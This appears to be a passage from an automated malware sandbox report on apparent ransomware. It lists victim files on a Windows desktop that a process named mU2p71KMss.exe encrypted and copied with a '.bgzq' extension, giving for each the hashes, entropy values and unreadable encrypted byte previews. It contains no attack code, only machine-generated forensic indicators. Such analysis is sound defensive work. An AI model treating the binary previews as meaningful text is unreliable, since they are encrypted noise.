                                                                                                SSDEEP:24:WrMQRq6W5gBR+P/cPKA5ujUUR4dRnKgk4nDhrRTwR8Dvuh1S5Ad62XCyVXfzIbD:RQU6I/cPKQubKwKFrRSmvcI2Sy9fzSD
                                                                                                MD5:542DBA23CDB9B517218DE28A344CEAA4
                                                                                                SHA1:9E3610C245AD16D38F311901C4C8CBBC72159B38
                                                                                                SHA-256:73DCA3CEEFA58FB95F98AE47BE788CCF3AA46ECB3719943BB74C6EC5ACCA9DE5
                                                                                                SHA-512:76C94B73F0CF7426F5348A7367220A7299082BE441F64DC18FAE7B8A9EDC940C9335D65E22F3A36D7AA0E20887E407AF42DEB3E164F3F07D64C7C3900B0BD19E
                                                                                                Malicious:false
                                                                                                Preview:EOWRV]B.?..^^U:G..v...V.$JZ[B.#}.:q.ukh.......)..wa...>..{.....|..+...:...Mlq#...i.....T...>...,...n. c.KI.}...........w.....W..>=........<..).4R.{6z....f...".U.z.6@......>[U.<.&I....K.+jc..<D...yM.1@j".-.P*.....*..j.o..=T....i6)o...G8kW.B...!.Y A......3.:Y...O..e.S..M.d3..Xwu......V..T.i./m..i. K..X.y.).2..0.=a.w.....z4..~D..{..n."3n.....[....F.R.QN...A..}.In{S=.$9.&g..%.F.x...3... ..q........h.......'.<i\G9.n-(.%T..4....[.DQh.b.c....._<.L...L?.........g-.).e.B/O.Po...o.t..5?....6....N|[[\...&z..O.?ag.FD..<I50....Y...X..,Ac.y..3...z..u.. .8.J....2.vj{.5.gW..'I.l....Y.G.].@.q9.p._6.D1....$..qo...[..:,..._q.(.,.k>.M.F.<./..B....U.a...(s..G..0.mymdN.UZb..0.2x.1..CM>dsm...... ....`......l.X......PV...B>.i.XS..S......G.....|(.{...o..R.!K}l...[WB.-.nH....3+H.Q.........).e..>...9...L.....6...t..>?.AJ....&...8\(.(L..........S"...O.Gq.O..["..^..Q...IZR._/)!.jQ.Czc.....@o8....Y...^-.~..wJ..@=.......u,........E|...tE.O.J..KT.l.|.49Z.m...t.*;Q.i....

                                                                                                C:\Users\user\Desktop\EOWRVPQCCS.png.bgzq (copy)

                                                                                                Download File
                                                                                                Process:C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1360
                                                                                                Entropy (8bit):7.857759943862415
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:WrMQRq6W5gBR+P/cPKA5ujUUR4dRnKgk4nDhrRTwR8Dvuh1S5Ad62XCyVXfzIbD:RQU6I/cPKQubKwKFrRSmvcI2Sy9fzSD
                                                                                                MD5:542DBA23CDB9B517218DE28A344CEAA4
                                                                                                SHA1:9E3610C245AD16D38F311901C4C8CBBC72159B38
                                                                                                SHA-256:73DCA3CEEFA58FB95F98AE47BE788CCF3AA46ECB3719943BB74C6EC5ACCA9DE5
                                                                                                SHA-512:76C94B73F0CF7426F5348A7367220A7299082BE441F64DC18FAE7B8A9EDC940C9335D65E22F3A36D7AA0E20887E407AF42DEB3E164F3F07D64C7C3900B0BD19E
                                                                                                Malicious:false
                                                                                                Preview:EOWRV]B.?..^^U:G..v...V.$JZ[B.#}.:q.ukh.......)..wa...>..{.....|..+...:...Mlq#...i.....T...>...,...n. c.KI.}...........w.....W..>=........<..).4R.{6z....f...".U.z.6@......>[U.<.&I....K.+jc..<D...yM.1@j".-.P*.....*..j.o..=T....i6)o...G8kW.B...!.Y A......3.:Y...O..e.S..M.d3..Xwu......V..T.i./m..i. K..X.y.).2..0.=a.w.....z4..~D..{..n."3n.....[....F.R.QN...A..}.In{S=.$9.&g..%.F.x...3... ..q........h.......'.<i\G9.n-(.%T..4....[.DQh.b.c....._<.L...L?.........g-.).e.B/O.Po...o.t..5?....6....N|[[\...&z..O.?ag.FD..<I50....Y...X..,Ac.y..3...z..u.. .8.J....2.vj{.5.gW..'I.l....Y.G.].@.q9.p._6.D1....$..qo...[..:,..._q.(.,.k>.M.F.<./..B....U.a...(s..G..0.mymdN.UZb..0.2x.1..CM>dsm...... ....`......l.X......PV...B>.i.XS..S......G.....|(.{...o..R.!K}l...[WB.-.nH....3+H.Q.........).e..>...9...L.....6...t..>?.AJ....&...8\(.(L..........S"...O.Gq.O..["..^..Q...IZR._/)!.jQ.Czc.....@o8....Y...^-.~..wJ..@=.......u,........E|...tE.O.J..KT.l.|.49Z.m...t.*;Q.i....

                                                                                                C:\Users\user\Desktop\GRXZDKKVDB.mp3

                                                                                                Download File
                                                                                                Process:C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1360
                                                                                                Entropy (8bit):7.86814036342798
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:04kAZ9Redy+kWNIW4akE4kn1ZfWA3jxISDQebOv2qRkURjpzc8oy0WrFXfzIbD:04kwg0+Jv4ZE4knffWAWwQtvH3jpzcqo
                                                                                                MD5:C2C40FE5802A8B5769AEA2F5BCBFF876
                                                                                                SHA1:C9E45AB1C52E3142A7AA70C10E729DBB471D1C37
                                                                                                SHA-256:C63B58561C33C707C502AE7F7CB42C3F97880DF04F427A373714E96B20711C28
                                                                                                SHA-512:39887A6F7BE980628A2499C52A67BE5961AD231C0A86A974C64589D4D46E69BC04C3328E9C1ECB2FF67D9DE77EEF89C7CA600FE84B9B7EA554F48E9657C4C2D7
                                                                                                Malicious:false
                                                                                                Preview:GRXZDJ..#*.!..H..W~b&)..T.,.h.g.....(.............(....x.Y[1c.Q......'..A../.IZ.R..S>....~.`...*7."...Y2..*.%...............=.8......10...>L..q......4.6J............s.y..4.;.rS._F..Po.........H.....\.M...)h....*xi.F.....l....-7.p......<....uj.....+....h..s.m_..@N.h).R.K.Ef...!.or...."Ve...f...=.{9...O...8..y..n..j0.1@......L.....:..-..>.l.!U..............5v....)..)$$....gkh.);$....d-..x..V.t[W^b3*_.....$.......::.9[k.f$....W?.f.*....M../....".(.`..,B.z.."R1.....'+............[. ..W[.pId..G.w!.e..<.J=.v.1..Cg.....6d..6qXt2....f.hi......W.R..P.A/...h..a.p<.V.1V.............|.h`*_....2....OX..^..Ao*X..k....#.....$..O`.T..|.-p.-....w.\A..>...r.V?O.SNu..q..K.VG}2>R.fV..K.E........g...3...._9..`Wm.K....^.B.....v8...M...t...r..]@.U........} ...q..ty>..nR..+.6....v..p....a2_&.7?.....M.{~.CZ.....{.a...|.?..MfrY=,D..V.G.8.E.W....Ge^.";..w..MRE.."`...|7s..&.K./iU30.]...y.p<@..$....k.`...7..b;.*_.1..f..P.3x.?..h...X.t...J.LP=.........Z.......d.....I..o.[

                                                                                                C:\Users\user\Desktop\GRXZDKKVDB.mp3.bgzq (copy)

                                                                                                Download File
                                                                                                Process:C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1360
                                                                                                Entropy (8bit):7.86814036342798
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:04kAZ9Redy+kWNIW4akE4kn1ZfWA3jxISDQebOv2qRkURjpzc8oy0WrFXfzIbD:04kwg0+Jv4ZE4knffWAWwQtvH3jpzcqo
                                                                                                MD5:C2C40FE5802A8B5769AEA2F5BCBFF876
                                                                                                SHA1:C9E45AB1C52E3142A7AA70C10E729DBB471D1C37
                                                                                                SHA-256:C63B58561C33C707C502AE7F7CB42C3F97880DF04F427A373714E96B20711C28
                                                                                                SHA-512:39887A6F7BE980628A2499C52A67BE5961AD231C0A86A974C64589D4D46E69BC04C3328E9C1ECB2FF67D9DE77EEF89C7CA600FE84B9B7EA554F48E9657C4C2D7
                                                                                                Malicious:false
                                                                                                Preview:GRXZDJ..#*.!..H..W~b&)..T.,.h.g.....(.............(....x.Y[1c.Q......'..A../.IZ.R..S>....~.`...*7."...Y2..*.%...............=.8......10...>L..q......4.6J............s.y..4.;.rS._F..Po.........H.....\.M...)h....*xi.F.....l....-7.p......<....uj.....+....h..s.m_..@N.h).R.K.Ef...!.or...."Ve...f...=.{9...O...8..y..n..j0.1@......L.....:..-..>.l.!U..............5v....)..)$$....gkh.);$....d-..x..V.t[W^b3*_.....$.......::.9[k.f$....W?.f.*....M../....".(.`..,B.z.."R1.....'+............[. ..W[.pId..G.w!.e..<.J=.v.1..Cg.....6d..6qXt2....f.hi......W.R..P.A/...h..a.p<.V.1V.............|.h`*_....2....OX..^..Ao*X..k....#.....$..O`.T..|.-p.-....w.\A..>...r.V?O.SNu..q..K.VG}2>R.fV..K.E........g...3...._9..`Wm.K....^.B.....v8...M...t...r..]@.U........} ...q..ty>..nR..+.6....v..p....a2_&.7?.....M.{~.CZ.....{.a...|.?..MfrY=,D..V.G.8.E.W....Ge^.";..w..MRE.."`...|7s..&.K./iU30.]...y.p<@..$....k.`...7..b;.*_.1..f..P.3x.?..h...X.t...J.LP=.........Z.......d.....I..o.[

                                                                                                C:\Users\user\Desktop\GRXZDKKVDB.pdf

                                                                                                Download File
                                                                                                Process:C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1360
                                                                                                Entropy (8bit):7.842044416795742
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:lhnN+VAaSOm29dvX3/HMOT2Gtow3vlUzQNLtEWwN9p5sU6W5ViodDJVXfzIbD:PnN+iaJm29dP3/HMgbCzkLSWwN9p5swU
                                                                                                MD5:1C0712EB4532D993DC4E87091C6C276A
                                                                                                SHA1:66F6F8899B7AF4E39EC4B28949DE65856A9EB3F3
                                                                                                SHA-256:08AAE9540E21FC2B56C9F230BB2FD763CCD1360989F3378EFD8A091A35DD0EF3
                                                                                                SHA-512:D126DA1B9A1A719AF7EF6FEE573EC70828C2604B66551C8B17501E5868A0194ACED2988FA69B57DA1B1E4073F1903182D9206DF33BAD07D010A22A4135497DAE
                                                                                                Malicious:false
                                                                                                Preview:GRXZD.D......A.=~....+_..CE....m..j5.O..E;.w2a.C.....E.e&#{...z(%....*}.2d.....sx,x.(C$j..kfv.Dj...&;...p...a.(....Hr,.a1?Y}..9.uB%.Q..!yE..h..v...85d.j.<..FIL._.....n.K..O.Y..]8}&.J......g}.5 .u.E....#D..=h...7l.2.4&..|...v......#.k;i.|........+.1.5rC.|R..~.....<4..m@..Y.^;.....V.^<F.....]..z.+=..x0.......%.6.Q9Sz.....>.....S...5.W..C.;.bF.9l[...T.:.~#Bk...b.Y2...7.u....mY......wX32~..ST.aqt5....#....UA.oUA.c./..U...y...3..6.gc....;p.^1.+......./f...<t.U.js....`.=..........l......ZW<.G....!I. T.0...Q..S.bN...........B2q...:.4*v..+.Gi.[..,.dz.7H{L.7B.:.=...G`|.V.O..x..7....M.1.M.....b...Gve(......L>...*c.A.)OhL<d.....#...g..:.<k4.M.X.D..&....Xe2q.......?.>.a..../3...9g..u..{..+.......p...X&..3.b@.. .......Dh.....2.h.K.+......".C0....&.h.q.E.[..X...r..K7.!.-....0..+W2d.;&..BmY..4...}'.......{...p..Z....._C........3...0..HN=C.o.^.....1..M.....,.ppO.Q5.AXk..p.....p..W.X.z]..k....{...cOa.|2q.NVJD...]. {...:.5..qkn.XNf..:.P2..&.:.

                                                                                                C:\Users\user\Desktop\GRXZDKKVDB.pdf.bgzq (copy)

                                                                                                Download File
                                                                                                Process:C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1360
                                                                                                Entropy (8bit):7.842044416795742
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:lhnN+VAaSOm29dvX3/HMOT2Gtow3vlUzQNLtEWwN9p5sU6W5ViodDJVXfzIbD:PnN+iaJm29dP3/HMgbCzkLSWwN9p5swU
                                                                                                MD5:1C0712EB4532D993DC4E87091C6C276A
                                                                                                SHA1:66F6F8899B7AF4E39EC4B28949DE65856A9EB3F3
                                                                                                SHA-256:08AAE9540E21FC2B56C9F230BB2FD763CCD1360989F3378EFD8A091A35DD0EF3
                                                                                                SHA-512:D126DA1B9A1A719AF7EF6FEE573EC70828C2604B66551C8B17501E5868A0194ACED2988FA69B57DA1B1E4073F1903182D9206DF33BAD07D010A22A4135497DAE
                                                                                                Malicious:false
                                                                                                Preview:GRXZD.D......A.=~....+_..CE....m..j5.O..E;.w2a.C.....E.e&#{...z(%....*}.2d.....sx,x.(C$j..kfv.Dj...&;...p...a.(....Hr,.a1?Y}..9.uB%.Q..!yE..h..v...85d.j.<..FIL._.....n.K..O.Y..]8}&.J......g}.5 .u.E....#D..=h...7l.2.4&..|...v......#.k;i.|........+.1.5rC.|R..~.....<4..m@..Y.^;.....V.^<F.....]..z.+=..x0.......%.6.Q9Sz.....>.....S...5.W..C.;.bF.9l[...T.:.~#Bk...b.Y2...7.u....mY......wX32~..ST.aqt5....#....UA.oUA.c./..U...y...3..6.gc....;p.^1.+......./f...<t.U.js....`.=..........l......ZW<.G....!I. T.0...Q..S.bN...........B2q...:.4*v..+.Gi.[..,.dz.7H{L.7B.:.=...G`|.V.O..x..7....M.1.M.....b...Gve(......L>...*c.A.)OhL<d.....#...g..:.<k4.M.X.D..&....Xe2q.......?.>.a..../3...9g..u..{..+.......p...X&..3.b@.. .......Dh.....2.h.K.+......".C0....&.h.q.E.[..X...r..K7.!.-....0..+W2d.;&..BmY..4...}'.......{...p..Z....._C........3...0..HN=C.o.^.....1..M.....,.ppO.Q5.AXk..p.....p..W.X.z]..k....{...cOa.|2q.NVJD...]. {...:.5..qkn.XNf..:.P2..&.:.

                                                                                                C:\Users\user\Desktop\GRXZDKKVDB.xlsx

                                                                                                Download File
                                                                                                Process:C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1360
                                                                                                Entropy (8bit):7.834761573593533
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:i1cPaj6XC19gG7KToZOcNrukkqi/lBEOSvYuRR10nD16LpydJv6wBWFaSXfzIbD:iOPco0v7woZOcpqrfSQ+UaA6NokfzSD
                                                                                                MD5:111217293322F8B41386110EF265A3AD
                                                                                                SHA1:A1EE7DA3BE035FDC4F1C5A6B3B82260E9218B3A3
                                                                                                SHA-256:AF2D660D0F0CE4F6F71DF74E2241AB09A219CC51156650EB12A6BD661824A799
                                                                                                SHA-512:8F630B75A5A69C92EE9B8B4F4AB6CA4F53CEE4009952483856897116632E534CB5F98256AAAC78DF68E598F5DCB38F0104E9BA8456E5BD47C1E7B133704BC9B3
                                                                                                Malicious:false
                                                                                                Preview:GRXZD>k{.~).b.......(B..?.5.2;z... ....V..&...b..')aN...W|..h.%..AY..Y..%.8......JS.V..@...g3..F..N.$.].V^?....S.D.9.4.8.c..q...@.v.e.8u5_u.%..6.u<.Y...RlS..F3n...1....Ei...`/.*l......AK..*I@.=g..v...voo....*~....`.........."..@|...t...j%..d..H....Y.........G..-I.+.U....5.....N..........<n.1I..|.D.;.l.B......d6.Go...=.Ki.....t.'......;.$-:;..vB......y..}L..8._..?.0..+..*.ul2.6.Vj.....Ma.a...l.5_k*..[..mPO..*...B5..q.../.9u...QsK.n.BlL@.n.S-...}.A+M4...A..4.f....../....Bg3......$m.b`+.O.h.3`k2.......=..._.}..}I..~....Y..>w..s/L..V...\-]..f...y..4mY./....!E........d.~..g.;.f'8 ..r..mU..D.....F9....FL0o....G.~..C.Go.4....[.pGl..>hC.!~.....4fv..^...m....)A@...0p.\.......raV^[t8....~.=..._....E.P....i.......E...Uyp..2.S..&pD.....L...$..Tc..".O.0!t..7K......f.[J....5W,.RA` gsW.h..0.N......,.7...oZG....%..\#...!..7eU...,.........7..Z2......F.b......+...KA..1:ou|r..*l.-V.N..r.t."..t.L...;...b(...f...dyRC..S.}g...Z.&S..<...h...fS..WmF.Z.ZP_.

                                                                                                C:\Users\user\Desktop\GRXZDKKVDB.xlsx.bgzq (copy)

                                                                                                Download File
                                                                                                Process:C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1360
                                                                                                Entropy (8bit):7.834761573593533
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:i1cPaj6XC19gG7KToZOcNrukkqi/lBEOSvYuRR10nD16LpydJv6wBWFaSXfzIbD:iOPco0v7woZOcpqrfSQ+UaA6NokfzSD
                                                                                                MD5:111217293322F8B41386110EF265A3AD
                                                                                                SHA1:A1EE7DA3BE035FDC4F1C5A6B3B82260E9218B3A3
                                                                                                SHA-256:AF2D660D0F0CE4F6F71DF74E2241AB09A219CC51156650EB12A6BD661824A799
                                                                                                SHA-512:8F630B75A5A69C92EE9B8B4F4AB6CA4F53CEE4009952483856897116632E534CB5F98256AAAC78DF68E598F5DCB38F0104E9BA8456E5BD47C1E7B133704BC9B3
                                                                                                Malicious:false
                                                                                                Preview:GRXZD>k{.~).b.......(B..?.5.2;z... ....V..&...b..')aN...W|..h.%..AY..Y..%.8......JS.V..@...g3..F..N.$.].V^?....S.D.9.4.8.c..q...@.v.e.8u5_u.%..6.u<.Y...RlS..F3n...1....Ei...`/.*l......AK..*I@.=g..v...voo....*~....`.........."..@|...t...j%..d..H....Y.........G..-I.+.U....5.....N..........<n.1I..|.D.;.l.B......d6.Go...=.Ki.....t.'......;.$-:;..vB......y..}L..8._..?.0..+..*.ul2.6.Vj.....Ma.a...l.5_k*..[..mPO..*...B5..q.../.9u...QsK.n.BlL@.n.S-...}.A+M4...A..4.f....../....Bg3......$m.b`+.O.h.3`k2.......=..._.}..}I..~....Y..>w..s/L..V...\-]..f...y..4mY./....!E........d.~..g.;.f'8 ..r..mU..D.....F9....FL0o....G.~..C.Go.4....[.pGl..>hC.!~.....4fv..^...m....)A@...0p.\.......raV^[t8....~.=..._....E.P....i.......E...Uyp..2.S..&pD.....L...$..Tc..".O.0!t..7K......f.[J....5W,.RA` gsW.h..0.N......,.7...oZG....%..\#...!..7eU...,.........7..Z2......F.b......+...KA..1:ou|r..*l.-V.N..r.t."..t.L...;...b(...f...dyRC..S.}g...Z.&S..<...h...fS..WmF.Z.ZP_.

                                                                                                C:\Users\user\Desktop\KLIZUSIQEN.png

                                                                                                Download File
                                                                                                Process:C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1360
                                                                                                Entropy (8bit):7.814159634966306
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:bn1EL1za58J/bLRtvfFdlQuHrRZ0gaB4OCShRGA+2P7jNkykEjVnpeVT3XfzIbD:1sfRPTJrRZ09KbOVJ9pWTnfzSD
                                                                                                MD5:E1C470A2EFB07DFB73CCF2068E73AE57
                                                                                                SHA1:D0024B0CA331CDBA8095E476DF76F7B7627F82C8
                                                                                                SHA-256:DB8B1506D2D6E13C2C81FDDBC4BFF79427B3B80BDE80B35BA3A2E0C4E6A8CFBE
                                                                                                SHA-512:1FDEE0561B786BDFC3FB2F1DB008DDAFFDEE43CA4D105D2726C7356A57F89DD2202800C70595FA6737B9AAA6B6F7AD8FD3184F0CE9690C24FDE1658E1B0EF62E
                                                                                                Malicious:false
                                                                                                Preview:KLIZU.sp..u(d0mzl......]Fm.V....l...d4d_..}.$@...v.,..R.f.:).OM.d.}......:.^.8..!.......Z.F....G....4.....,<...UEE.W.W.....?+.XO....:g...LsU.SD*..U..b.#.0.s:..F..Bi....W.n.Ly.x\..uo.zW+..}$...-=9......P...M.. ..U....d.......s.3~..7...2......r.n.v.P|.r..,.E}...PB..h.G...>...T..!.u..`S.R.E.....m.....}....7W_.%.~.(.R.?.h...im..?.$Z....-j-Zy(.9...1......3...x..nt......+..q.*s..M.i.]..!8!W..-...b..x.-...HL5..CP........*..7U..q.....Q..B.J..}.?..e.6/.\....Z.\..P!S..&f...N.*.xV.g.....P.....z..|...2....5?n.:.~....O.6KD&T2}$..g......~`...}k....$.C8..r...}..Jwz_....l..(|..A.u....d.7/g.3.2....d.CC..S1...Q...!.^U.T.A...J.(#......<.?...8n".....v..H*q..6.}0.-.yb.[..d..1.(.{..#.&B...U;s..qTY.....R..=Y....@_...m..$/..9.gl...\9.FSb........|.}...$.@.]..bP}.4.UH........[.&....:.R#.SEM..3.....PI.);.....(.W.......T..:.w..63.].....T..H...!...Ud..f..i|VX.....R.7.s..?e`........!W+..x.p........?7a....;.>^."?.H.b..Q.;5...w.Y........w...x.....+..{`G%..h ..A...Y../

                                                                                                C:\Users\user\Desktop\KLIZUSIQEN.png.bgzq (copy)

                                                                                                Download File
                                                                                                Process:C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1360
                                                                                                Entropy (8bit):7.814159634966306
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:bn1EL1za58J/bLRtvfFdlQuHrRZ0gaB4OCShRGA+2P7jNkykEjVnpeVT3XfzIbD:1sfRPTJrRZ09KbOVJ9pWTnfzSD
                                                                                                MD5:E1C470A2EFB07DFB73CCF2068E73AE57
                                                                                                SHA1:D0024B0CA331CDBA8095E476DF76F7B7627F82C8
                                                                                                SHA-256:DB8B1506D2D6E13C2C81FDDBC4BFF79427B3B80BDE80B35BA3A2E0C4E6A8CFBE
                                                                                                SHA-512:1FDEE0561B786BDFC3FB2F1DB008DDAFFDEE43CA4D105D2726C7356A57F89DD2202800C70595FA6737B9AAA6B6F7AD8FD3184F0CE9690C24FDE1658E1B0EF62E
                                                                                                Malicious:false
                                                                                                Preview:KLIZU.sp..u(d0mzl......]Fm.V....l...d4d_..}.$@...v.,..R.f.:).OM.d.}......:.^.8..!.......Z.F....G....4.....,<...UEE.W.W.....?+.XO....:g...LsU.SD*..U..b.#.0.s:..F..Bi....W.n.Ly.x\..uo.zW+..}$...-=9......P...M.. ..U....d.......s.3~..7...2......r.n.v.P|.r..,.E}...PB..h.G...>...T..!.u..`S.R.E.....m.....}....7W_.%.~.(.R.?.h...im..?.$Z....-j-Zy(.9...1......3...x..nt......+..q.*s..M.i.]..!8!W..-...b..x.-...HL5..CP........*..7U..q.....Q..B.J..}.?..e.6/.\....Z.\..P!S..&f...N.*.xV.g.....P.....z..|...2....5?n.:.~....O.6KD&T2}$..g......~`...}k....$.C8..r...}..Jwz_....l..(|..A.u....d.7/g.3.2....d.CC..S1...Q...!.^U.T.A...J.(#......<.?...8n".....v..H*q..6.}0.-.yb.[..d..1.(.{..#.&B...U;s..qTY.....R..=Y....@_...m..$/..9.gl...\9.FSb........|.}...$.@.]..bP}.4.UH........[.&....:.R#.SEM..3.....PI.);.....(.W.......T..:.w..63.].....T..H...!...Ud..f..i|VX.....R.7.s..?e`........!W+..x.p........?7a....;.>^."?.H.b..Q.;5...w.Y........w...x.....+..{`G%..h ..A...Y../

                                                                                                C:\Users\user\Desktop\NVWZAPQSQL.docx

                                                                                                Download File
                                                                                                Process:C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1360
                                                                                                Entropy (8bit):7.862757340061894
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:FZV8UYpe4WxFUOjQfUoRggW+ddQQNI8GKcECDN5HMlipPPCGTmkbx835DmXfzIbD:FDWptWfBYDW8L+RtQgPK4hbx835Dgfz6
                                                                                                MD5:53BBCDC4875631F2AE817436900918BD
                                                                                                SHA1:9DF52458CAF3AD0B14544976BF2199D34AD0641E
                                                                                                SHA-256:24FFFBD18DAAEE6F0D3DD37440B2C307C55D11F787EEA1E055569B048FAE74F4
                                                                                                SHA-512:135A4D4B172D020C80CAE85031D6866FAF2AD75A1B6BA4FD42B4B5185312C02AC25B3E00759B0DDBF5F67A1A3936278D89A4154B6C097A68679A8CF3AF5C07A5
                                                                                                Malicious:false
                                                                                                Preview:NVWZA.(.'......*..?(..&..5../R...>.1...}...[..(....x...T.....F...V.p..r...`.b.......vM....a.j..w.)$X'p.3..M@..TST.gw.;^......C....\;f.g{b.I..$.0......m..t.!S{.[w.Zq..(b.@!J;.f...4../..$......n....?C.S....;..w.....X.f..nm... ..@........MW.-o.).\ ..3....O:)O....ErA.&Qu./..C1........K.4.!..b.....B....J....T.....=.\.{.....=.:&...,.......[....o..+7.\f..A.T.....Eg..D.#o..b.......K.... O7Q...!....9..{#...he.'..l.m.s..*_.r.:.U..vT....R..^..*3.:..4#......./.RK...'.Z.....J.w..8.)-..g.)f.*.J...IV4.......I]..w =>'....s"...It.X.c!..@.!....*.....`....._..P.6Q..+^..!.'..S..=.V.I..M.2.S5=.U<P..H.d......V5.n...B.......^....O,P}...Se........."$.{\.?6..|.8.K...95..w....\.o.(Y...#hQ.`..,.....@.7..6.i...d.H....P..D..1cm.QFGN.].-V ..L.V..,D%.GL....f.....#... .~@.h?....._.....T.Mh...^.X..^.j.62.E.....|...V.WC.~.y.a.K1..w.H.>....i..MI.z(.....}....l.6K.4.$...L...[..<i.Og.X....@...o.i.i.`...(....h..6...Y...........T.....2.&~....}......,W.:.Sj....X...@.....U......

                                                                                                C:\Users\user\Desktop\NVWZAPQSQL.docx.bgzq (copy)

                                                                                                Download File
                                                                                                Process:C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1360
                                                                                                Entropy (8bit):7.862757340061894
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:FZV8UYpe4WxFUOjQfUoRggW+ddQQNI8GKcECDN5HMlipPPCGTmkbx835DmXfzIbD:FDWptWfBYDW8L+RtQgPK4hbx835Dgfz6
                                                                                                MD5:53BBCDC4875631F2AE817436900918BD
                                                                                                SHA1:9DF52458CAF3AD0B14544976BF2199D34AD0641E
                                                                                                SHA-256:24FFFBD18DAAEE6F0D3DD37440B2C307C55D11F787EEA1E055569B048FAE74F4
                                                                                                SHA-512:135A4D4B172D020C80CAE85031D6866FAF2AD75A1B6BA4FD42B4B5185312C02AC25B3E00759B0DDBF5F67A1A3936278D89A4154B6C097A68679A8CF3AF5C07A5
                                                                                                Malicious:false
                                                                                                Preview:NVWZA.(.'......*..?(..&..5../R...>.1...}...[..(....x...T.....F...V.p..r...`.b.......vM....a.j..w.)$X'p.3..M@..TST.gw.;^......C....\;f.g{b.I..$.0......m..t.!S{.[w.Zq..(b.@!J;.f...4../..$......n....?C.S....;..w.....X.f..nm... ..@........MW.-o.).\ ..3....O:)O....ErA.&Qu./..C1........K.4.!..b.....B....J....T.....=.\.{.....=.:&...,.......[....o..+7.\f..A.T.....Eg..D.#o..b.......K.... O7Q...!....9..{#...he.'..l.m.s..*_.r.:.U..vT....R..^..*3.:..4#......./.RK...'.Z.....J.w..8.)-..g.)f.*.J...IV4.......I]..w =>'....s"...It.X.c!..@.!....*.....`....._..P.6Q..+^..!.'..S..=.V.I..M.2.S5=.U<P..H.d......V5.n...B.......^....O,P}...Se........."$.{\.?6..|.8.K...95..w....\.o.(Y...#hQ.`..,.....@.7..6.i...d.H....P..D..1cm.QFGN.].-V ..L.V..,D%.GL....f.....#... .~@.h?....._.....T.Mh...^.X..^.j.62.E.....|...V.WC.~.y.a.K1..w.H.>....i..MI.z(.....}....l.6K.4.$...L...[..<i.Og.X....@...o.i.i.`...(....h..6...Y...........T.....2.&~....}......,W.:.Sj....X...@.....U......

                                                                                                C:\Users\user\Desktop\NVWZAPQSQL.jpg

                                                                                                Download File
                                                                                                Process:C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1360
                                                                                                Entropy (8bit):7.855889765523058
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:FKrW3EHrw5ZZAhHdaaYrTucoUOmQspCv2uXZA0+DlmpPZfSkUXfzIbD:FKr+9gbOpoUNNJ/0+BmdBOfzSD
                                                                                                MD5:8EFD964564294135C3680096D373EC4F
                                                                                                SHA1:A64B4A7FFFA3FFDDE12E7D2207713F4F09598694
                                                                                                SHA-256:F9613C52B17C5981C8C74D1673239ED9E91451E8F4E5CB2CDA059056AC8D6E61
                                                                                                SHA-512:BFE0BEE378C47F02B6E94027BF3D5759018E03756895AD030EA34897A4429FD2B054502519AFBB0FA285A954D2CCCD0BB1C44A26A05D32C569E4C050CD6C3593
                                                                                                Malicious:false
